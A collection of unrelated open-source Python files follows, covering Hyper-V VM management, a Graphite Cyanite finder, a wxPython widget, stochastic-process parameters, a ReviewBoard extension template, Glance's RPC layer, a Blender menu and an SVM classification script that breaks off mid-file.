wmi_result_class=self._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
rasds = vmsettings[0].associators(
wmi_result_class=self._SERIAL_PORT_SETTING_DATA_CLASS)
serial_port = (
[r for r in rasds if
r.ResourceSubType == self._SERIAL_PORT_RES_SUB_TYPE][0])
if update_connection:
serial_port.Connection = [update_connection]
self._modify_virt_resource(serial_port, vm.path_())
if len(serial_port.Connection) > 0:
return serial_port.Connection[0]
def get_active_instances(self):
"""Return the names of all the active instances known to Hyper-V."""
vm_names = self.list_instances()
vms = [self._lookup_vm(vm_name) for vm_name in vm_names]
active_vm_names = [v.ElementName for v in vms
if v.EnabledState == constants.HYPERV_VM_STATE_ENABLED]
return active_vm_names
def get_vm_power_state_change_listener(self, timeframe, filtered_states):
field = self._VM_ENABLED_STATE_PROP
query = self._get_event_wql_query(cls=self._COMPUTER_SYSTEM_CLASS,
field=field,
timeframe=timeframe,
filtered_states=filtered_states)
return self._conn.Msvm_ComputerSystem.watch_for(raw_wql=query,
fields=[field])
def _get_event_wql_query(self, cls, field,
timeframe, filtered_states=None):
"""Return a WQL query used for polling WMI events.
:param cls: the WMI class polled for events
:param field: the field checked
:param timeframe: check for events that occurred in
the specified timeframe
:param filtered_states: only catch events triggered when a WMI
object transitioned into one of those
states.
"""
query = ("SELECT %(field)s, TargetInstance "
"FROM __InstanceModificationEvent "
"WITHIN %(timeframe)s "
"WHERE TargetInstance ISA '%(class)s' "
"AND TargetInstance.%(field)s != "
"PreviousInstance.%(field)s" %
{'class': cls,
'field': field,
'timeframe': timeframe})
if filtered_states:
checks = ["TargetInstance.%s = '%s'" % (field, state)
for state in filtered_states]
query += " AND (%s)" % " OR ".join(checks)
return query
def _get_instance_notes(self, vm_name):
vm = self._lookup_vm_check(vm_name)
vmsettings = self._get_vm_setting_data(vm)
return [note for note in vmsettings.Notes.split('\n') if note]
def get_instance_uuid(self, vm_name):
instance_notes = self._get_instance_notes(vm_name)
if instance_notes and uuidutils.is_uuid_like(instance_notes[0]):
return instance_notes[0]
def get_vm_power_state(self, vm_enabled_state):
return self._enabled_states_map.get(vm_enabled_state,
constants.HYPERV_VM_STATE_OTHER)
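# A standalone sketch (not part of the original module, no WMI connection
# required) of two patterns used by VMUtils above: inverting
# _vm_power_states_map for reverse lookups, as done in __init__, and composing
# the WQL event query built by _get_event_wql_query(). The numeric states and
# the 2-second timeframe are example values only.
if __name__ == '__main__':
    power_states = {'enabled': 2, 'disabled': 3, 'paused': 32768}
    enabled_states = {v: k for k, v in power_states.items()}
    print(enabled_states[2])  # -> 'enabled'
    field = 'EnabledState'
    query = ("SELECT %(field)s, TargetInstance "
             "FROM __InstanceModificationEvent "
             "WITHIN %(timeframe)s "
             "WHERE TargetInstance ISA '%(class)s' "
             "AND TargetInstance.%(field)s != "
             "PreviousInstance.%(field)s" %
             {'class': 'Msvm_ComputerSystem', 'field': field, 'timeframe': 2})
    filtered_states = [2, 3]
    checks = ["TargetInstance.%s = '%s'" % (field, state)
              for state in filtered_states]
    query += " AND (%s)" % " OR ".join(checks)
    print(query)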
| apache-2.0 | -3,523,847,542,262,560,000 | 41.823884 | 79 | 0.574322 | false |
brutasse/graphite-cyanite | cyanite.py | 1 | 3875 |
import itertools
import time
try:
from graphite_api.intervals import Interval, IntervalSet
from graphite_api.node import LeafNode, BranchNode
except ImportError:
from graphite.intervals import Interval, IntervalSet
from graphite.node import LeafNode, BranchNode
import requests
def chunk(nodelist, length):
chunklist = []
linelength = 0
for node in nodelist:
# the magic number 6 is because the nodes list gets padded
# with '&path=' in the resulting request
nodelength = len(str(node)) + 6
if linelength + nodelength > length:
yield chunklist
chunklist = [node]
linelength = nodelength
else:
chunklist.append(node)
linelength += nodelength
yield chunklist
class CyaniteLeafNode(LeafNode):
__fetch_multi__ = 'cyanite'
class URLs(object):
def __init__(self, hosts):
self.iterator = itertools.cycle(hosts)
@property
def host(self):
return next(self.iterator)
@property
def paths(self):
return '{0}/paths'.format(self.host)
@property
def metrics(self):
return '{0}/metrics'.format(self.host)
urls = None
urllength = 8000
class CyaniteReader(object):
__slots__ = ('path',)
def __init__(self, path):
self.path = path
def fetch(self, start_time, end_time):
data = requests.get(urls.metrics, params={'path': self.path,
'from': start_time,
'to': end_time}).json()
if 'error' in data:
return (start_time, end_time, end_time - start_time), []
if len(data['series']) == 0:
return
time_info = data['from'], data['to'], data['step']
return time_info, data['series'].get(self.path, [])
def get_intervals(self):
# TODO use cyanite info
return IntervalSet([Interval(0, int(time.time()))])
class CyaniteFinder(object):
__fetch_multi__ = 'cyanite'
def __init__(self, config=None):
global urls
global urllength
if config is not None:
if 'urls' in config['cyanite']:
urls = config['cyanite']['urls']
else:
urls = [config['cyanite']['url'].strip('/')]
if 'urllength' in config['cyanite']:
urllength = config['cyanite']['urllength']
else:
from django.conf import settings
urls = getattr(settings, 'CYANITE_URLS')
if not urls:
urls = [settings.CYANITE_URL]
urllength = getattr(settings, 'CYANITE_URL_LENGTH', urllength)
urls = URLs(urls)
def find_nodes(self, query):
paths = requests.get(urls.paths,
params={'query': query.pattern}).json()
for path in paths:
if path['leaf']:
yield CyaniteLeafNode(path['path'],
CyaniteReader(path['path']))
else:
yield BranchNode(path['path'])
def fetch_multi(self, nodes, start_time, end_time):
paths = [node.path for node in nodes]
data = {}
for pathlist in chunk(paths, urllength):
tmpdata = requests.get(urls.metrics,
params={'path': pathlist,
'from': start_time,
'to': end_time}).json()
if 'error' in tmpdata:
return (start_time, end_time, end_time - start_time), {}
if 'series' in data:
data['series'].update(tmpdata['series'])
else:
data = tmpdata
time_info = data['from'], data['to'], data['step']
return time_info, data['series']
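# A small usage sketch for chunk() above (not part of the original module;
# the metric names and the 100-character budget are example values). It
# splits a list of paths into batches whose combined encoded length stays
# under the budget, mirroring how fetch_multi() batches requests against
# `urllength`.
if __name__ == '__main__':
    example_paths = ['servers.web%d.cpu.load' % i for i in range(10)]
    for batch in chunk(example_paths, 100):
        print(batch)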
| bsd-3-clause | -7,961,674,116,645,386,000 | 29.753968 | 74 | 0.531097 | false |
ezequielpereira/Time-Line | libs/wx/lib/stattext.py | 6 | 5824 |
#----------------------------------------------------------------------
# Name: wx.lib.stattext
# Purpose: A generic wxGenStaticText class. Using this should
# eliminate some of the platform differences in wxStaticText,
# such as background colours and mouse sensitivity.
#
# Author: Robin Dunn
#
# Created: 8-July-2002
# RCS-ID: $Id: stattext.py 49762 2007-11-09 17:50:59Z AG $
# Copyright: (c) 2002 by Total Control Software
# Licence: wxWindows license
#----------------------------------------------------------------------
# 12/12/2003 - Jeff Grimmett ([email protected])
#
# o 2.5 compatibility update.
# o Untested.
#
import wx
BUFFERED = 0 # In unbuffered mode we can let the theme shine through,
# is there a way to do this when buffering?
#----------------------------------------------------------------------
class GenStaticText(wx.PyControl):
labelDelta = 1
def __init__(self, parent, ID, label,
pos = wx.DefaultPosition, size = wx.DefaultSize,
style = 0,
name = "genstattext"):
wx.PyControl.__init__(self, parent, ID, pos, size, style|wx.NO_BORDER,
wx.DefaultValidator, name)
wx.PyControl.SetLabel(self, label) # don't check wx.ST_NO_AUTORESIZE yet
self.InheritAttributes()
self.SetInitialSize(size)
self.Bind(wx.EVT_PAINT, self.OnPaint)
if BUFFERED:
self.defBackClr = self.GetBackgroundColour()
self.Bind(wx.EVT_ERASE_BACKGROUND, self.OnEraseBackground)
else:
self.SetBackgroundStyle(wx.BG_STYLE_SYSTEM)
def SetLabel(self, label):
"""
Sets the static text label and updates the control's size to exactly
fit the label unless the control has wx.ST_NO_AUTORESIZE flag.
"""
wx.PyControl.SetLabel(self, label)
style = self.GetWindowStyleFlag()
self.InvalidateBestSize()
if not style & wx.ST_NO_AUTORESIZE:
self.SetSize(self.GetBestSize())
self.Refresh()
def SetFont(self, font):
"""
Sets the static text font and updates the control's size to exactly
fit the label unless the control has wx.ST_NO_AUTORESIZE flag.
"""
wx.PyControl.SetFont(self, font)
style = self.GetWindowStyleFlag()
self.InvalidateBestSize()
if not style & wx.ST_NO_AUTORESIZE:
self.SetSize(self.GetBestSize())
self.Refresh()
def DoGetBestSize(self):
"""
Overridden base class virtual. Determines the best size of
the control based on the label size and the current font.
"""
label = self.GetLabel()
font = self.GetFont()
if not font:
font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
dc = wx.ClientDC(self)
dc.SetFont(font)
maxWidth = totalHeight = 0
for line in label.split('\n'):
if line == '':
w, h = dc.GetTextExtent('W') # empty lines have height too
else:
w, h = dc.GetTextExtent(line)
totalHeight += h
maxWidth = max(maxWidth, w)
best = wx.Size(maxWidth, totalHeight)
self.CacheBestSize(best)
return best
def Enable(self, enable=True):
"""Overridden Enable() method to properly refresh the widget. """
wx.PyControl.Enable(self, enable)
self.Refresh()
def Disable(self):
"""Overridden Disable() method to properly refresh the widget. """
wx.PyControl.Disable(self)
self.Refresh()
def AcceptsFocus(self):
"""Overridden base class virtual."""
return False
def GetDefaultAttributes(self):
"""
Overridden base class virtual. By default we should use
the same font/colour attributes as the native StaticText.
"""
return wx.StaticText.GetClassDefaultAttributes()
def ShouldInheritColours(self):
"""
Overridden base class virtual. If the parent has non-default
colours then we want this control to inherit them.
"""
return True
def OnPaint(self, event):
if BUFFERED:
dc = wx.BufferedPaintDC(self)
else:
dc = wx.PaintDC(self)
width, height = self.GetClientSize()
if not width or not height:
return
if BUFFERED:
clr = self.GetBackgroundColour()
backBrush = wx.Brush(clr, wx.SOLID)
if wx.Platform == "__WXMAC__" and clr == self.defBackClr:
# if colour is still the default then use the striped background on Mac
backBrush.MacSetTheme(1) # 1 == kThemeBrushDialogBackgroundActive
dc.SetBackground(backBrush)
dc.Clear()
if self.IsEnabled():
dc.SetTextForeground(self.GetForegroundColour())
else:
dc.SetTextForeground(wx.SystemSettings.GetColour(wx.SYS_COLOUR_GRAYTEXT))
dc.SetFont(self.GetFont())
label = self.GetLabel()
style = self.GetWindowStyleFlag()
x = y = 0
for line in label.split('\n'):
if line == '':
w, h = self.GetTextExtent('W') # empty lines have height too
else:
w, h = self.GetTextExtent(line)
if style & wx.ALIGN_RIGHT:
x = width - w
if style & wx.ALIGN_CENTER:
x = (width - w)/2
dc.DrawText(line, x, y)
y += h
def OnEraseBackground(self, event):
pass
#----------------------------------------------------------------------
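# A minimal usage sketch (not part of the original module; it assumes a
# working wxPython installation and a display). It shows GenStaticText being
# used as a drop-in replacement for wx.StaticText.
if __name__ == '__main__':
    app = wx.App(False)
    frame = wx.Frame(None, title="GenStaticText demo")
    GenStaticText(frame, -1, "Hello\nfrom GenStaticText",
                  style=wx.ALIGN_CENTER)
    frame.Show()
    app.MainLoop()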
| gpl-3.0 | -7,898,543,669,757,521,000 | 30.652174 | 87 | 0.547218 | false |
NicovincX2/Python-3.5 | Probabilités/Processus stochastique/parameters.py | 1 | 4286 |
# -*- coding: utf-8 -*-
import math
import numpy
import random
import decimal
import scipy.linalg
import numpy.random as nrand
import matplotlib.pyplot as plt
class ModelParameters:
"""
Encapsulates model parameters
"""
def __init__(self,
all_s0, all_time, all_delta, all_sigma, gbm_mu,
jumps_lamda=0.0, jumps_sigma=0.0, jumps_mu=0.0,
cir_a=0.0, cir_mu=0.0, all_r0=0.0, cir_rho=0.0,
ou_a=0.0, ou_mu=0.0,
heston_a=0.0, heston_mu=0.0, heston_vol0=0.0):
# This is the starting asset value
self.all_s0 = all_s0
# This is the amount of time to simulate for
self.all_time = all_time
# This is the delta, the rate of time e.g. 1/252 = daily, 1/12 =
# monthly
self.all_delta = all_delta
# This is the volatility of the stochastic processes
self.all_sigma = all_sigma
# This is the annual drift factor for geometric brownian motion
self.gbm_mu = gbm_mu
# This is the probability of a jump happening at each point in time
self.lamda = jumps_lamda
# This is the volatility of the jump size
self.jumps_sigma = jumps_sigma
# This is the average jump size
self.jumps_mu = jumps_mu
# This is the rate of mean reversion for Cox Ingersoll Ross
self.cir_a = cir_a
# This is the long run average interest rate for Cox Ingersoll Ross
self.cir_mu = cir_mu
# This is the starting interest rate value
self.all_r0 = all_r0
# This is the correlation between the wiener processes of the Heston
# model
self.cir_rho = cir_rho
# This is the rate of mean reversion for Ornstein Uhlenbeck
self.ou_a = ou_a
# This is the long run average interest rate for Ornstein Uhlenbeck
self.ou_mu = ou_mu
# This is the rate of mean reversion for volatility in the Heston model
self.heston_a = heston_a
# This is the long run average volatility for the Heston model
self.heston_mu = heston_mu
# This is the starting volatility value for the Heston model
self.heston_vol0 = heston_vol0
mp = ModelParameters(all_s0=1000,
all_r0=0.5,
all_time=800,
all_delta=0.00396825396,
all_sigma=0.125,
gbm_mu=0.058,
jumps_lamda=0.00125,
jumps_sigma=0.001,
jumps_mu=-0.2,
cir_a=3.0,
cir_mu=0.5,
cir_rho=0.5,
ou_a=3.0,
ou_mu=0.5,
heston_a=0.25,
heston_mu=0.35,
heston_vol0=0.06125)
paths = 15
def plot_stochastic_processes(processes, title):
"""
This method plots a list of stochastic processes with a specified title
:return: plots the graph of the two
"""
plt.style.use(['bmh'])
fig, ax = plt.subplots(1)
fig.suptitle(title, fontsize=16)
ax.set_xlabel('Time, t')
ax.set_ylabel('Simulated Asset Price')
x_axis = numpy.arange(0, len(processes[0]), 1)
for i in range(len(processes)):
plt.plot(x_axis, processes[i])
plt.show()
def convert_to_returns(log_returns):
"""
This method exponentiates a sequence of log returns to get daily returns.
:param log_returns: the log returns to exponentiated
:return: the exponentiated returns
"""
return numpy.exp(log_returns)
def convert_to_prices(param, log_returns):
"""
This method converts a sequence of log returns into normal returns (exponentiation) and then computes a price
sequence given a starting price, param.all_s0.
:param param: the model parameters object
    :param log_returns: the log returns to exponentiate
    :return: the resulting price sequence as a numpy array, starting at param.all_s0
"""
returns = convert_to_returns(log_returns)
# A sequence of prices starting with param.all_s0
price_sequence = [param.all_s0]
for i in range(1, len(returns)):
# Add the price at t-1 * return at t
price_sequence.append(price_sequence[i - 1] * returns[i - 1])
return numpy.array(price_sequence)
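# A short usage sketch tying the helpers above together (not part of the
# original script). It draws i.i.d. Gaussian log returns as a stand-in for a
# full stochastic-process model and converts them into price paths with
# convert_to_prices(), using the `mp` parameters and `paths` count defined
# above.
if __name__ == '__main__':
    example_paths = []
    for i in range(paths):
        log_returns = nrand.normal(loc=mp.gbm_mu * mp.all_delta,
                                   scale=mp.all_sigma * math.sqrt(mp.all_delta),
                                   size=mp.all_time)
        example_paths.append(convert_to_prices(mp, log_returns))
    plot_stochastic_processes(example_paths, 'Gaussian log-return price paths')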
| gpl-3.0 | -1,243,897,321,032,333,800 | 34.716667 | 113 | 0.589827 | false |
atagar/ReviewBoard | contrib/tools/templates/extensions/extension/extension.py | 2 | 1347 |
# {{extension_name}} Extension for Review Board.
from django.conf import settings
from django.conf.urls.defaults import patterns, include
from reviewboard.extensions.base import Extension
{%- if dashboard_link is not none %}
from reviewboard.extensions.hooks import DashboardHook, URLHook
{% endif %}
{%- if dashboard_link is not none %}
class {{class_name}}URLHook(URLHook):
def __init__(self, extension, *args, **kwargs):
pattern = patterns('', (r'^{{package_name}}/',
include('{{package_name}}.urls')))
super({{class_name}}URLHook, self).__init__(extension, pattern)
class {{class_name}}DashboardHook(DashboardHook):
def __init__(self, extension, *args, **kwargs):
entries = [{
'label': '{{dashboard_link}}',
'url': settings.SITE_ROOT + '{{package_name}}/',
}]
super({{class_name}}DashboardHook, self).__init__(extension,
entries=entries, *args, **kwargs)
{%- endif %}
class {{class_name}}(Extension):
{%- if is_configurable %}
is_configurable = True
{%- endif %}
def __init__(self, *args, **kwargs):
super({{class_name}}, self).__init__()
{%- if dashboard_link is not none %}
self.url_hook = {{class_name}}URLHook(self)
self.dashboard_hook = {{class_name}}DashboardHook(self)
{%- endif %}
| mit | 7,088,152,217,563,539,000 | 34.447368 | 71 | 0.610245 | false |
yanheven/glance | glance/common/rpc.py | 5 | 9265 |
# Copyright 2013 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
RPC Controller
"""
import datetime
import traceback
from oslo_config import cfg
from oslo_log import log as logging
import oslo_utils.importutils as imp
from oslo_utils import timeutils
import six
from webob import exc
from glance.common import client
from glance.common import exception
from glance.common import utils
from glance.common import wsgi
from glance import i18n
LOG = logging.getLogger(__name__)
_ = i18n._
_LE = i18n._LE
rpc_opts = [
# NOTE(flaper87): Shamelessly copied
# from oslo rpc.
cfg.ListOpt('allowed_rpc_exception_modules',
default=['openstack.common.exception',
'glance.common.exception',
'exceptions',
],
help='Modules of exceptions that are permitted to be recreated'
' upon receiving exception data from an rpc call.'),
]
CONF = cfg.CONF
CONF.register_opts(rpc_opts)
class RPCJSONSerializer(wsgi.JSONResponseSerializer):
def _sanitizer(self, obj):
def to_primitive(_type, _value):
return {"_type": _type, "_value": _value}
if isinstance(obj, datetime.datetime):
return to_primitive("datetime", timeutils.strtime(obj))
return super(RPCJSONSerializer, self)._sanitizer(obj)
class RPCJSONDeserializer(wsgi.JSONRequestDeserializer):
def _to_datetime(self, obj):
return timeutils.parse_strtime(obj)
def _sanitizer(self, obj):
try:
_type, _value = obj["_type"], obj["_value"]
return getattr(self, "_to_" + _type)(_value)
except (KeyError, AttributeError):
return obj
class Controller(object):
"""
Base RPCController.
This is the base controller for RPC based APIs. Commands
handled by this controller respect the following form:
[{
'command': 'method_name',
'kwargs': {...}
}]
The controller is capable of processing more than one command
per request and will always return a list of results.
:params raise_exc: Boolean that specifies whether to raise
exceptions instead of "serializing" them.
"""
def __init__(self, raise_exc=False):
self._registered = {}
self.raise_exc = raise_exc
def register(self, resource, filtered=None, excluded=None, refiner=None):
"""
Exports methods through the RPC Api.
:params resource: Resource's instance to register.
:params filtered: List of methods that *can* be registered. Read
as "Method must be in this list".
:params excluded: List of methods to exclude.
:params refiner: Callable to use as filter for methods.
:raises AssertionError: If refiner is not callable.
"""
funcs = filter(lambda x: not x.startswith("_"), dir(resource))
if filtered:
funcs = [f for f in funcs if f in filtered]
if excluded:
funcs = [f for f in funcs if f not in excluded]
if refiner:
assert callable(refiner), "Refiner must be callable"
funcs = filter(refiner, funcs)
for name in funcs:
meth = getattr(resource, name)
if not callable(meth):
continue
self._registered[name] = meth
def __call__(self, req, body):
"""
Executes the command
"""
if not isinstance(body, list):
msg = _("Request must be a list of commands")
raise exc.HTTPBadRequest(explanation=msg)
def validate(cmd):
if not isinstance(cmd, dict):
msg = _("Bad Command: %s") % str(cmd)
raise exc.HTTPBadRequest(explanation=msg)
command, kwargs = cmd.get("command"), cmd.get("kwargs")
if (not command or not isinstance(command, six.string_types) or
(kwargs and not isinstance(kwargs, dict))):
msg = _("Wrong command structure: %s") % (str(cmd))
raise exc.HTTPBadRequest(explanation=msg)
method = self._registered.get(command)
if not method:
# Just raise 404 if the user tries to
# access a private method. No need for
# 403 here since logically the command
# is not registered to the rpc dispatcher
raise exc.HTTPNotFound(explanation=_("Command not found"))
return True
# If more than one command were sent then they might
# be intended to be executed sequentially, that for,
# lets first verify they're all valid before executing
# them.
commands = filter(validate, body)
results = []
for cmd in commands:
# kwargs is not required
command, kwargs = cmd["command"], cmd.get("kwargs", {})
method = self._registered[command]
try:
result = method(req.context, **kwargs)
except Exception as e:
if self.raise_exc:
raise
cls, val = e.__class__, utils.exception_to_str(e)
msg = (_LE("RPC Call Error: %(val)s\n%(tb)s") %
dict(val=val, tb=traceback.format_exc()))
LOG.error(msg)
# NOTE(flaper87): Don't propagate all exceptions
# but the ones allowed by the user.
module = cls.__module__
if module not in CONF.allowed_rpc_exception_modules:
cls = exception.RPCError
val = six.text_type(exception.RPCError(cls=cls, val=val))
cls_path = "%s.%s" % (cls.__module__, cls.__name__)
result = {"_error": {"cls": cls_path, "val": val}}
results.append(result)
return results
class RPCClient(client.BaseClient):
def __init__(self, *args, **kwargs):
self._serializer = RPCJSONSerializer()
self._deserializer = RPCJSONDeserializer()
self.raise_exc = kwargs.pop("raise_exc", True)
self.base_path = kwargs.pop("base_path", '/rpc')
super(RPCClient, self).__init__(*args, **kwargs)
@client.handle_unauthenticated
def bulk_request(self, commands):
"""
Execute multiple commands in a single request.
:params commands: List of commands to send. Commands
must respect the following form:
{
'command': 'method_name',
'kwargs': method_kwargs
}
"""
body = self._serializer.to_json(commands)
response = super(RPCClient, self).do_request('POST',
self.base_path,
body)
return self._deserializer.from_json(response.read())
def do_request(self, method, **kwargs):
"""
Simple do_request override. This method serializes
the outgoing body and builds the command that will
be sent.
:params method: The remote python method to call
:params kwargs: Dynamic parameters that will be
passed to the remote method.
"""
content = self.bulk_request([{'command': method,
'kwargs': kwargs}])
# NOTE(flaper87): Return the first result if
# a single command was executed.
content = content[0]
# NOTE(flaper87): Check if content is an error
# and re-raise it if raise_exc is True. Before
# checking if content contains the '_error' key,
# verify if it is an instance of dict - since the
# RPC call may have returned something different.
if self.raise_exc and (isinstance(content, dict)
and '_error' in content):
error = content['_error']
try:
exc_cls = imp.import_class(error['cls'])
raise exc_cls(error['val'])
except ImportError:
# NOTE(flaper87): The exception
# class couldn't be imported, using
# a generic exception.
raise exception.RPCError(**error)
return content
def __getattr__(self, item):
"""
This method returns a method_proxy that
will execute the rpc call in the registry
service.
"""
if item.startswith('_'):
raise AttributeError(item)
def method_proxy(**kw):
return self.do_request(item, **kw)
return method_proxy
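# A self-contained sketch (not part of the original module) of the command
# format handled by Controller above. FakeRequest and ExampleResource are
# illustrative stand-ins; a real deployment dispatches through the WSGI stack
# and RPCClient instead.
if __name__ == '__main__':
    class FakeRequest(object):
        context = None

    class ExampleResource(object):
        def add(self, context, a, b):
            return a + b

    controller = Controller()
    controller.register(ExampleResource())
    commands = [{'command': 'add', 'kwargs': {'a': 1, 'b': 2}}]
    print(controller(FakeRequest(), commands))  # -> [3]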
| apache-2.0 | 7,369,825,429,521,806,000 | 32.207885 | 79 | 0.575175 | false |
dantebarba/docker-media-server | plex/IPTV.bundle/Contents/Code/locale_patch.py | 4 | 3262 |
# -*- coding: utf-8 -*-
"""
Localization patch for Plex Media Server channels
https://bitbucket.org/czukowski/plex-locale-patch/
Copyright: 2015, Korney Czukowski
License: MIT
"""
languages = list()
# Translate function override to avoid unicode decoding bug.
def L(string):
initialize_locale()
local_string = Locale.LocalString(string)
return str(local_string).decode()
def SetAvailableLanguages(list):
global languages
languages = list
# Client language detection.
# Make sure this function does its thing only the first time it's called (once per request).
def initialize_locale():
if 'Plex-Locale-Patch' in Request.Headers:
return
for parse_func in [parse_x_plex_language_value, parse_accept_language_value]:
value = parse_func()
if value:
set_language_header(value)
break
if not value:
Log('Locale Patch: language not detected. All request headers: %s' % str(Request.Headers))
Request.Headers['Plex-Locale-Patch'] = 'y'
# Parse 'X-Plex-Language' header
def parse_x_plex_language_value():
if 'X-Plex-Language' in Request.Headers:
header_value = Request.Headers['X-Plex-Language']
matched_value = Locale.Language.Match(header_value)
if matched_value == 'xx':
return
Log('Locale Patch: found language in X-Plex-Language header ("%s" matched to "%s")' % (header_value, matched_value))
return select_available_language([matched_value])
# Parse 'Accept-Language' header
# Based on http://stackoverflow.com/a/17911139
def parse_accept_language_value():
if 'Accept-Language' in Request.Headers:
header_value = Request.Headers['Accept-Language']
# Extract all locales and their preference (q)
locales = [] # e.g. [('es', 1.0), ('en-US', 0.8), ('en', 0.6)]
for locale_str in header_value.replace(' ', '').lower().split(','):
locale_parts = locale_str.split(';q=')
locale = locale_parts[0]
if len(locale_parts) > 1:
locale_q = float(locale_parts[1])
else:
locale_q = 1.0
locales.append((locale, locale_q))
# Sort locales according to preference
locales.sort(key=lambda locale_tuple: locale_tuple[1], reverse=True)
# Remove weights from the list, keep only locale names
locales = map(lambda locale_tuple: locale_tuple[0], locales)
if len(locales):
Log('Locale Patch: found languages in Accept-Language header (%s)' % header_value)
return select_available_language(locales)
def select_available_language(locales):
global languages
if not len(languages):
        Log('Locale Patch: no known available languages, using "%s" as the %s choice. Call SetAvailableLanguages(list) function to improve this.' % (locales[0], 'only' if len(languages) == 1 else 'first'))
return locales[0]
for item in locales:
if item in languages:
Log('Locale Patch: using available language "%s".' % item)
return item
Log('Locale Patch: none of the languages matched available languages.')
def set_language_header(value):
    Request.Headers['X-Plex-Language'] = value
| gpl-3.0 | -667,973,978,703,167,900 | 36.505747 | 205 | 0.644083 | false |
raphv/cardmapper | src/cardapp/migrations/0002_date fix.py | 1 | 1361 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-23 09:54
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cardapp', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='card',
name='date_created',
field=models.DateTimeField(auto_now_add=True, db_index=True),
),
migrations.AlterField(
model_name='card',
name='date_updated',
field=models.DateTimeField(auto_now=True, db_index=True),
),
migrations.AlterField(
model_name='cardmap',
name='date_created',
field=models.DateTimeField(auto_now_add=True, db_index=True),
),
migrations.AlterField(
model_name='cardmap',
name='date_updated',
field=models.DateTimeField(auto_now=True, db_index=True),
),
migrations.AlterField(
model_name='deck',
name='date_created',
field=models.DateTimeField(auto_now_add=True, db_index=True),
),
migrations.AlterField(
model_name='deck',
name='date_updated',
field=models.DateTimeField(auto_now=True, db_index=True),
),
]
| mit | -6,418,556,618,558,211,000 | 29.244444 | 73 | 0.559882 | false |
portnov/sverchok | utils/text_editor_submenu.py | 3 | 2474 |
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import os
import bpy
from bpy.props import StringProperty
from sverchok.utils.sv_update_utils import sv_get_local_path
sv_path = os.path.dirname(sv_get_local_path()[0])
def get_template_path():
return os.path.join(sv_path, "node_scripts", "templates")
def get_templates():
path = get_template_path()
return [(t, t, "") for t in next(os.walk(path))[2]]
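# Operator that opens the chosen template from the templates folder as an
# internal text datablock in Blender's text editor.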
class SvScriptLoader(bpy.types.Operator):
""" Load Scripts into TextEditor """
bl_idname = "node.script_template"
bl_label = "Sverchok script template"
bl_options = {'REGISTER', 'UNDO'}
# from object in
script_path = StringProperty(name='script path')
def execute(self, context):
path = get_template_path()
file_to_load = os.path.join(path, self.script_path)
bpy.ops.text.open(filepath=file_to_load, internal=True)
return {'FINISHED'}
class SvTextSubMenu(bpy.types.Menu):
bl_idname = "TEXT_MT_templates_submenu"
bl_label = "Sv NodeScripts"
bl_options = {'REGISTER', 'UNDO'}
def draw(self, context):
layout = self.layout
m = get_templates()
t = "node.script_template"
for name, p, _ in m:
layout.operator(t, text=name).script_path = p
def menu_draw(self, context):
self.layout.menu("TEXT_MT_templates_submenu")
def register():
bpy.utils.register_class(SvScriptLoader)
bpy.utils.register_class(SvTextSubMenu)
bpy.types.TEXT_MT_templates.append(menu_draw)
def unregister():
bpy.utils.unregister_class(SvScriptLoader)
bpy.utils.unregister_class(SvTextSubMenu)
bpy.types.TEXT_MT_templates.remove(menu_draw)
if __name__ == "__main__":
register()
| gpl-3.0 | -4,420,080,900,627,678,700 | 28.105882 | 74 | 0.681892 | false |
ipashchenko/ml4vs | ml4vs/svm_final.py | 1 | 4272 | import os
import numpy as np
from sklearn.cross_validation import (StratifiedShuffleSplit, StratifiedKFold,
cross_val_score)
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import Imputer
from sklearn.svm import SVC
from data_load import load_data, load_data_tgt
data_dir = '/home/ilya/code/ml4vs/data/LMC_SC20__corrected_list_of_variables/raw_index_values'
file_1 = 'vast_lightcurve_statistics_variables_only.log'
file_0 = 'vast_lightcurve_statistics_constant_only.log'
file_0 = os.path.join(data_dir, file_0)
file_1 = os.path.join(data_dir, file_1)
names = ['Magnitude', 'clipped_sigma', 'meaningless_1', 'meaningless_2',
'star_ID', 'weighted_sigma', 'skew', 'kurt', 'I', 'J', 'K', 'L',
'Npts', 'MAD', 'lag1', 'RoMS', 'rCh2', 'Isgn', 'Vp2p', 'Jclp', 'Lclp',
'Jtim', 'Ltim', 'CSSD', 'Ex', 'inv_eta', 'E_A', 'S_B', 'NXS', 'IQR']
names_to_delete = ['meaningless_1', 'meaningless_2', 'star_ID',
'Npts', 'CSSD', 'clipped_sigma', 'lag1', 'L', 'Lclp', 'Jclp',
'MAD', 'Ltim']
X, y, df, feature_names, delta = load_data([file_0, file_1], names,
names_to_delete)
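# Imputation -> standardisation -> RBF SVM pipeline; the C, gamma and class-weight values
# below are presumably the result of a separate hyperparameter search (this script only
# does the final fit and the blind-test prediction).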
clf = SVC(C=37.3, class_weight={0: 1, 1: 3}, probability=True,
gamma=0.0126, random_state=1)
estimators = list()
estimators.append(('imputer', Imputer(missing_values='NaN', strategy='median',
axis=0, verbose=2)))
estimators.append(('scaler', StandardScaler()))
estimators.append(('clf', clf))
pipeline = Pipeline(estimators)
# Fit on all training data
pipeline.fit(X, y)
# Load blind test data
file_tgt = 'LMC_SC19_PSF_Pgood98__vast_lightcurve_statistics.log'
file_tgt = os.path.join(data_dir, file_tgt)
